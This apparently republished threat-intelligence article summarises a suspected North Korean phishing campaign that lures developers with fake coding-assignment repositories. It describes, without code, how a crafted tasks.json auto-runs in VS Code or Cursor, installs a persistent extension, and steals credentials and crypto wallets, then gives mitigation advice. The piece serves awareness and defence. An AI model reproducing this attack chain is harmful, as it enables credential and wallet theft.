How a North Korean Hacker Group Uses Fake Coding Assignments to Steal Crypto Wallets

From April to May 2026, a hacker group tracked as UNK_DeadDrop, suspected of North Korean ties, emailed over 250 phishing messages to developers at nearly one hundred companies, mainly in the US tech, education, and finance sectors, with a focus on cryptocurrency firms.

1. Attack Overview

1.1 Background

Proofpoint’s research identifies the campaign as a social‑engineering operation that disguises malicious code as a "coding assignment" or code‑review request, exploiting developers’ openness to technical collaboration.

1.2 Attack Process

The attackers follow a four‑step workflow:

Step 1 – Contact Target: They reach developers via LinkedIn, GitHub, Upwork, etc., posing as recruiters or technical peers and offering high‑pay positions or collaboration projects.

Step 2 – Deliver Malicious Repository Link: The phishing email contains a link to a fabricated GitHub or GitLab repository that the victim is asked to clone and open.

Step 3 – Trigger Payload: The repository includes a specially crafted tasks.json file; when opened in VS Code or Cursor, the malicious code runs automatically. VS Code shows a trust prompt, while Cursor executes silently.

Step 4 – Install Malicious Extension: The payload masquerades as a Google service and installs a malicious VS Code extension that re‑activates the payload each time the editor is reopened.

2. Technical Analysis

2.1 Payload Platform Branches

The chain splits by target operating system:

Linux/macOS:

Retrieves a Go‑written RAT from the open‑source Overlord framework.

Displays a fake password dialog to capture system credentials.

Escalates to root using the stolen password.

Exports all credentials from Keychain (macOS) or Keyring (Linux).

Windows:

Executes JavaScript directly inside the VS Code editor.

Leaves no files on disk, evading traditional antivirus detection.

Bypasses Chrome’s app‑bound encryption to steal saved browser passwords.

2.2 Targeted Assets

The malware scans for and steals:

Browser wallet extensions: MetaMask, Phantom, Keplr.

Desktop wallet applications: Exodus, Electrum, Ledger Live.

Browser credentials: Passwords and cookies stored in Chrome, Brave, Edge, Firefox.

After exfiltration, the malicious loader deletes its files to erase traces.

2.3 Link to the “Contagious Interview” Campaign

Proofpoint notes a clear connection to the long‑running “Contagious Interview” operation, which has used fake recruitment as a lure against developers since 2022. UNK_DeadDrop differs by relying on email delivery, industrial‑scale repository creation, and a self‑contained payload that survives infrastructure removal.

3. Domestic Impact Analysis

3.1 High‑Risk Groups

Freelance developers on platforms such as Upwork or Fiverr.

Remote workers, especially those involved in cryptocurrency projects.

Members of cryptocurrency communities who hold or manage digital assets.

Code reviewers who frequently audit open‑source repositories.

3.2 Situation in China

Similar developer‑targeted attacks have been observed since 2022, often with attackers impersonating HR personnel or technical recruiters from well‑known tech firms. The expanding domestic crypto community increases the pool of potential victims.

3.3 Mitigation Recommendations

Be wary of unfamiliar repository links; do not clone or open code claimed to be a "test task" or "code review" without verification.

VS Code users should scrutinize trust prompts and avoid clicking "Trust" on unknown folders.

Test suspicious code only in isolated environments such as virtual machines or sandboxes.

Verify the background of any recruiter or interview invitation through official channels.

Prefer hardware wallets over browser extensions for managing cryptocurrency assets.

Assess GitHub repository credibility by checking stars, contributor history, and overall reputation before cloning.

4. Conclusion

The group’s tactics have grown increasingly sophisticated: rather than attacking exchanges directly, they infiltrate developers via fake coding assignments, gradually compromising wallets. Social engineering proves to be the most potent weapon, with the weakest link being human trust rather than code flaws.

Copyright Notice: This article is originally published by 华盟网 and all rights are reserved.